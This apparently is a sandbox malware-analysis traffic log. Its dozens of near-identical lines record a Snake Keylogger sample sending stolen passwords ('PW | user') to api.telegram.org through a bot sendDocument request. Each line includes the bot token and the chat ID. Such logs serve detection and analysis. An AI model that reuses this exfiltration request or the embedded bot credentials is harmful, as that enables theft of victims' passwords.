                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f218e9b8Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f23f1164Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f25e1060Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f27aaaf6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f2b1806bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f2e5f3feHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f31ccb95Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f33968c1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3513e44Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3703e3cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f385b3d9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3a4b001Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3c3aea9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3db8728Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3f8239eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f41721baHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f42efb39Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4446daeHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4636ccfHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f47b43a1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f490b922Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4afb74cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4c78f72Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4edb3a4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5032b33Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f51b008bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f539ff42Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f54f76baHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5674ca3Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f57f2362Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f59bc08bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5b39700Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5d9be34Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5f1944bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f60e30cfHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6260960Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f63ddf5aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f65a7c41Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6725283Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f68a2bcbHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6a6c7a7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6be9e54Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6d67670Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6f3139cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f70ae976Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7193963Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7310ec4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7500d3dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f765838fHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f77d5a04Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f79531e4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7aaa6feHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc8e57daHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f9c112f6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f9ebfc06Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa063563Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa1e0cdaHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa35e4b2Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa67f5d6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa9c6a51Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fab6a4feHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fad0deecHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255faefdd62Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb0a16dcHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb21ed31Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb3e8a7bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb5b2567Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb77c217Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb8f9955Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbac356bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbc66f63Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbe30b62Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbffa78bHost: api.telegram.orgContent-Length: 407
